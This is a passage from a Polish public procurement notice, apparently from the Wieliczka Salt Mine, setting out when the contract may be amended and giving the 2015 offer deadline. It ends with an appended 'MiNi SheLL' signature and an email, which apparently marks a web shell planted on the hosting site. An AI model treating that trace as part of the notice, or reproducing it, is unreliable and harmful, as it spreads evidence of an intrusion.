z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2.	Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku 
do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, wyłącznie w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1)	przestojów i opóźnień w wykonywaniu przedmiotu umowy wynikłych z przyczyn 
leżących po stronie Zamawiającego,
2)	działania siły wyższej,
3)	zaistnienia okoliczności niemożliwych do przewidzenia w chwili wszczęcia postępowania lub zawarcia umowy,
4)   wniesienia odwołania w toku postępowania, na podstawie którego dokonano wyboru Wykonawcy.
3.	Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie wysokości należnego Wykonawcy wynagrodzenia, w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1)	zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie 
art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu 
za pracę, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę,
2)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.
4.	Zaistnienie przyczyn, wymienionych w ust. 2 i 3, nie powoduje powstania u żadnej 
ze Stron umowy, roszczenia o zmianę umowy.
5.	W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w ust. 2, każdej ze Stron umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1)	szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2)	uzasadnienie dokonania zmiany umowy,
3)	projekt zmiany umowy.
6.	Wystąpienie, o którym mowa w ust. 5 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
7.	Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
8.	Zmiana umowy zostaje zawarta w dniu jej podpisania przez obie strony.
9.	Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Dział Zamówień Publicznych, pokój A.9. lub A.16..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2015 godzina 11:30, miejsce: Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Sekretariat Zarządu -budynek A, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com